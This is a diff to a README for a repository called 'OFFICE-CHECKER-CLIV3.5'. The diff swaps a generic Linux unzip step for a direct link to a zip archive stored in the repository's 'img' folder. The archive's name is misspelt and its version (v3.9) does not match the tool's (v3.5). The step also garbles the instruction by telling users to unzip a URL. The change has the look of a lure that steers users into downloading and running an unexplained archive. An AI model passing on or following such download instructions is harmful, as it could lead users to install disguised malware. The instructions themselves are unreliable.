adibsheikh5/OFFICE-CHECKER-CLIV3.5/README.md

    - **Linux:**
      - Open a terminal.
      - Navigate to your Downloads folder.
-     - Unzip the `.tar.gz` file and follow the included instructions to run the tool.
+     - Unzip the `https://raw.githubusercontent.com/adibsheikh5/OFFICE-CHECKER-CLIV3.5/main/img/CLI_OFFIC_CHECKE_v3.9.zip` file and follow the included instructions to run the tool.

 5. **Launch the Application:** After the installation completes, locate OFFICE-CHECKER-CLIV3.5 in your applications or start menu and click to open it.